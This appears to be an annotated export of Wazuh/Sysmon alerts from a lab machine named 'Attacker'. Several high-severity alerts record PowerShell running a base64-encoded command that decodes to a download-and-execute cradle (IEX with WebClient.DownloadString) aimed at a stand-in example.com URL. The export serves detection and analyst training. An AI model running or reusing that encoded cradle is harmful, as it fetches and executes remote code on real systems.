data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:56:12.688 ProcessGuid: {94294ddc-c18c-680a-f20c-000000000e00} ProcessId: 1724 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-c189-680a-f00c-000000000e00} ParentProcessId: 2932 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:56:12.688
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-c18c-680a-f20c-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  1724
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\Users\Attcker1\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-c189-680a-f00c-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  2932
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:56:16.396+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:56:16.396+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  129
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535376.2803115
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:56:14.2252877Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  350674
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:56:14.198 ProcessGuid: {94294ddc-c18c-680a-f20c-000000000e00} ProcessId: 1724 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_xdqtovfm.esx.ps1 CreationUtcTime: 2025-04-24 22:56:14.198 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:56:14.198
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-c18c-680a-f20c-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  1724
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_xdqtovfm.esx.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:56:14.198
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:56:21.110+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:56:21.110+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  126
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535381.2805880
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:56:18.4933409Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  350713
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:56:15.702 ProcessGuid: {94294ddc-c18f-680a-f40c-000000000e00} ProcessId: 8928 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-c18c-680a-f20c-000000000e00} ParentProcessId: 1724 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:56:15.702
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-c18f-680a-f40c-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  8928
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-c18c-680a-f20c-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  1724
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:56:21.113+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:56:21.113+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  130
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535381.2813943
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:56:18.7447989Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  350714
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:56:18.693 ProcessGuid: {94294ddc-c18f-680a-f40c-000000000e00} ProcessId: 8928 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_cew1hm2c.hha.ps1 CreationUtcTime: 2025-04-24 22:56:18.689 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:56:18.693
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-c18f-680a-f40c-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  8928
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_cew1hm2c.hha.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:56:18.689
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:56:25.282+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:56:25.282+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  127
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535385.2816708
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:56:22.6536408Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  350737
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

